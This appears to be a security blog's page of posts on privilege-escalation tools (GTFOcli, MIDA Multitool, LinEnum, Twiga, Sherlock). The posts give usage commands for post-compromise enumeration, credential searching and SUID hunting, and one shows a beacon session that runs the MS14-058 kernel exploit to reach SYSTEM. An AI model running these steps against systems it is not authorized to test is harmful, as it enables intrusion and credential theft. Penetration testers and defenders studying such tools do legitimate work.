Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Privilege Escalation. Show all posts
Showing posts with label Privilege Escalation. Show all posts

Saturday, May 11, 2024

Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems


GTFOcli it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in misconfigured systems.


Installation

Using go:

go install github.com/cmd-tools/gtfocli@latest

Using homebrew:

brew tap cmd-tools/homebrew-tap
brew install gtfocli

Using docker:

docker pull cmdtoolsowner/gtfocli

Usage

Search for unix binaries

Search for binary tar:

gtfocli search tar

Search for binary tar from stdin:

echo "tar" | gtfocli search

Search for binaries located into file;

cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail

gtfocli search -f myBinaryList.txt

Search for windows binaries

Search for binary Winget.exe:

gtfocli search Winget --os windows

Search for binary Winget from stdin:

echo "Winget" | gtfocli search --os windows

Search for binaries located into file:

cat windowsExecutableList.txt
Winget
c:\\Users\\Desktop\\Ssh
Stordiag
Bash
c:\\Users\\Runonce.exe
Cmdkey
c:\dir\subDir\Users\Certreq.exe

gtfocli search -f windowsExecutableList.txt --os windows

Search for binary Winget and print output in yaml format (see -h for available formats):

gtfocli search Winget -o yaml --os windows

Search using dockerized solution

Examples:

Search for binary Winget and print output in yaml format:

docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows

Search for binary tar and print output in json format:

echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json

Search for binaries located into file mounted as volume in the container:

cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail

docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt

CTF

An example of common use case for gtfocli is together with find:

find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null

or

find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search

Credits

Thanks to GTFOBins and LOLBAS, without these projects gtfocli would never have come to light.

Contributing

You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.


Share:

Thursday, November 16, 2017

Bash Script Purposed For System Enumeration, Vulnerability Identification And Privilege Escalation - MIDA-Multitool







Bash script purposed for system enumeration, vulnerability identification and privilege escalation.
MIDA Multitool draws functionality from several of my previous scripts namely SysEnum and RootHelper and is in many regards RootHelpers successor.
Besides functionality from these two previous scripts it incorporates some of it's own and as such aims to be a comprehensive assistant for operations and utilities related to system enumeration, vulnerability identification, exploitation and privilege escalation.


Usage
After a system has been succesfully compromised MIDA should be downloaded to the host in question either with git or wget, after it has been unpacked/cloned the shellscript needs to be made executable with chmod +x mida.sh
Upon doing so it can be run on the target host. The options available to the user are below.
The 'Usage' option prints this informational message. The option 'System Enumeration' attempts to retrieve system information such as OS and kernel details, network status, processes, system logs and more. 'Common Utilities' checks for the existence of useful utilities such as telnet, netcat, tcpdump etc. 'External Utilities' opens a menu which lets you download external utilities that may prove to be helpful with further enumeration, vulnerability identification and privilege escalation.
Finally the option 'Cleartext Credentials' searches for text and web application files that contain certain keywords in order to find potential cleartext passwords.

Scripts available for download with MIDA



Share:

Saturday, October 28, 2017

Scripted Local Linux Enumeration and Privilege Escalation Checks - LinEnum v0.6



LinEnum will automate many of the checks that I’ve documented in the Local Linux Enumeration & Privilege Escalation Cheatsheet. It’s a very basic shell script that performs over 65 checks, getting anything from kernel information to locating possible escalation points such as potentially useful SUID/GUID files and Sudo/rhost mis-configurations and more.

General usage:
version 0.6
  • Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t

OPTIONS:
  • -k Enter keyword
  • -e Enter export location
  • -t Include thorough (lengthy) tests
  • -r Enter report name
  • -h Displays this help text
Running with no options = limited scans/no output file
  • -e Requires the user enters an output location i.e. /tmp/export. If this location does not exist, it will be created.
  • -r Requires the user to enter a report name. The report (.txt file) will be saved to the current working directory.
  • -t Performs thorough (slow) tests. Without this switch default 'quick' scans are performed.
  • -k An optional switch for which the user can search for a single keyword within many files (documented below).

High-level summary of the checks/tasks performed by LinEnum:
  • Kernel and distribution release details
  • System Information:
    • Hostname
    • Networking details:
    • Current IP
    • Default route details
    • DNS server information
  • User Information:
    • Current user details
    • Last logged on users
    • Shows users logged onto the host
    • List all users including uid/gid information
    • List root accounts
    • Extracts password policies and hash storage method information
    • Checks umask value
    • Checks if password hashes are stored in /etc/passwd
    • Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
    • Attempt to read restricted files i.e. /etc/shadow
    • List current users history files (i.e .bash_history, .nano_history etc.)
    • Basic SSH checks
  • Privileged access:
    • Determine if /etc/sudoers is accessible
    • Determine if the current user has Sudo access without a password
    • Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
    • Is root’s home directory accessible
    • List permissions for /home/
  • Environmental:
    • Display current $PATH
    • Displays env information
  • Jobs/Tasks:
    • List all cron jobs
    • Locate all world-writable cron jobs
    • Locate cron jobs owned by other users of the system
  • Services:
    • List network connections (TCP & UDP)
    • List running processes
    • Lookup and list process binaries and associated permissions
    • List inetd.conf/xined.conf contents and associated binary file permissions
    • List init.d binary permissions
  • Version Information (of the following):
    • Sudo
    • MYSQL
    • Postgres
    • Apache
      • Checks user config
      • Shows enabled modules
  • Default/Weak Credentials:
    • Checks for default/weak Postgres accounts
    • Checks for default/weak MYSQL accounts
  • Searches:
    • Locate all SUID/GUID files
    • Locate all world-writable SUID/GUID files
    • Locate all SUID/GUID files owned by root
    • Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
    • List all world-writable files
    • Find/list all accessible *.plan files and display contents
    • Find/list all accessible *.rhosts files and display contents
    • Show NFS server details
    • Locate *.conf and *.log files containing keyword supplied at script runtime
    • List all *.conf files located in /etc
    • Locate mail
  • Platform/software specific tests:
    • Checks to determine if we're in a Docker container
    • Checks to see if the host has Docker installed

Share:

Thursday, September 21, 2017

A Tool That Enumerates Android Devices For Information Useful In Understanding Its Internals And For Exploit Development - Twiga





A tool that enumerates Android devices for information useful in understanding its internals and for exploit development. It supports android 4.2 to android 7.1.1

Requirements
  • The most current ADB must be in your path and fully functional
  • The report name must not have any whitespace

Limitations
  • Some information and files cannot be pulled higher up the SDK version due to strict SELinux policies and android hardening.
  • It can only run on one device at a time for now

To Do
  • Support for enumeration on a rooted device
  • Support enumeration on multiple devices at a time
  • Generate PDF report on the enumartuon data

Inspired by




Share:

Saturday, May 27, 2017

Tool to find missing Windows patches for Local Privilege Escalation Vulnerabilities - Sherlock


PowerShell script to quickly find missing Microsoft patches for local privilege escalation vulnerabilities.

Currently looks for:
  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : Secondary Logon Handle

Tested on:
  • Windows 7 SP1 32-bit
  • Windows 7 SP1 64-bit
  • Windows 8 64-bit
  • Windows 10 64-bit

Basic Usage:
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-AllVulns
[*] Tasked beacon to run: Find-AllVulns
[+] host called home, sent: 21 bytes
[+] received output:


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)


Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition